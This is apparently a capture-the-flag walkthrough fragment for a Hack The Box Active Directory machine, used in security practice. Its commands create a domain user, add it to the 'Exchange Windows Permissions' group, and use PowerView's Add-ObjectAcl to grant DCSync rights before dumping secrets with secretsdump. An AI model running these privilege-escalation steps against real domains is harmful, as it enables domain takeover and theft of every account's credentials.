30-creating a user
net user ctflover password123 /add /domain
net group "Exchange Windows Permissions"
the group has no members so we can add ourselves
net group "Exchange Windows Permissions" /add ctflover
We Need powerview in order to do this, I tried using master branch but i got some errors so i ll try dev branch powerview
git clone https://github.com/PowerShellMafia/PowerSploit.git -b dev
Upload the powerview.ps1 to the target machine.
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'password123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\ctflover', $SecPassword)
Add-ObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity ctflover -Rights DCSync
It worked properly now i can use secretsdump to dump secrets.